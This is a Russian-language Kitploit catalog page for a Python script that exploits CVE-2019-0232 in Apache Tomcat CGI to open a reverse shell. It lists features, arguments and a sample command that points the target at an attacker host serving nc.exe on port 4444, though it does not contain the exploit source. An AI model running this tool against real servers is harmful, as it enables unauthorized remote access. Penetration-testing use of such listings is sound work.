Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-0232_tomcat_cgi_exploit | Kitploit
Инструменты/GitHubGitHub/x3m1sec/cve-2019-0232_tomcat_cgi_exploit
Генерация полезной нагрузкиЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubx3m1sec/cve-2019-0232_tomcat_cgi_exploit

CVE-2019-0232_tomcat_cgi_exploit

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
1 год назадЕщё не проверено

Скрипт эксплойта CGI для Apache Tomcat

Описание

Скрипт на Python, предназначенный для эксплуатации CGI-уязвимостей на серверах Apache Tomcat путем установления обратного shell-соединения.

Пример использования

Пример выполнения скрипта

Возможности

  • Автоматизированный эксплойт для CGI-уязвимостей Apache Tomcat
  • Настраиваемые параметры цели и атакующего
  • Простой интерфейс командной строки

Предварительные требования

  • Python 3.x
  • Библиотека requests
  • Netcat (nc.exe)
  • Доступ к listener для получения обратного shell

Установка

root@kitploit:~
git clone <url-del-repositorio>
cd <directorio-del-repositorio>
pip install requests

Использование

root@kitploit:~
python3 tomcat_cgi_exploit.py -t <IP_OBJETIVO> -i <IP_ATACANTE> -ncp <PUERTO_SHELL_INVERSO>

Обязательные аргументы

  • -t, --target: IP-адрес цели с Apache Tomcat
  • -i, --ip: IP-адрес атакующего, на котором размещен nc.exe
  • -ncp, --nc-port: Порт для обратного shell-соединения

Необязательные аргументы

  • -p, --port: Порт цели (по умолчанию: 8080)
  • -sp, --server-port: Порт сервера для размещения nc.exe (по умолчанию: 80)
  • -cgi, --cgi-script: Имя эксплуатируемого CGI-скрипта (по умолчанию: cmd.bat)

Пример

root@kitploit:~
python3 tomcat_cgi_exploit.py -t 192.168.1.100 -i 192.168.1.50 -ncp 4444

Правовой отказ от ответственности

Этот инструмент предоставляется исключительно в образовательных целях и для авторизованного тестирования на проникновение. Автор и участники не несут ответственности за любое неправомерное использование или ущерб, причиненный данным скриптом. Всегда получайте надлежащее разрешение перед тестированием любой системы.

Автор

  • Jose Miguel Romero (k3Pn1c)
Скачать инструмент